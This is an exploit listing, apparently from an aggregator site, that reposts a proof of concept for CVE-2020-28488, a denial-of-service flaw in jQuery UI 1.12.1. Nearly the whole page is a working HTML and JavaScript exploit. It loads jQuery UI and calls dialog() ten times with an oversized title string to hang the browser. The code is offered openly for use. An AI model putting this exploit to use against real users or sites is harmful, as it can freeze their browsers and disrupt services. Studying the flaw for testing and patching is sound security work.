Exploit for jQuery UI 1.12.1 Denial Of Service CVE-2020-28488

Name: Exploit for jQuery UI 1.12.1 Denial Of Service CVE-2020-28488
Rating: 5 (273 reviews)

2021-01-28 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:161167
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)  
# Date: 20 Jan, 2021  
# Exploit Author: Rafael Cintra Lopes  
# Vendor Homepage: https://jqueryui.com/  
# Software Link: https://jqueryui.com/download/  
# Version: <= 1.12.1  
# CVE : CVE-2020-28488  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>DoS - jQuery UI 1.12.1</title>  
</head>  
<body>  
<h2>DoS - jQuery UI 1.12.1</h2>  
  
<div>  
<button onclick="exploit()">Exploit</button>  
</div>  
  
<p>PoC by Rafael Cintra Lopes</p>  
  
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>  
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>  
  
<script>  
function exploit(){  
for (var i = 0; i < 10; i++) {  
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});  
}  
}  
</script>  
</body>  
</html>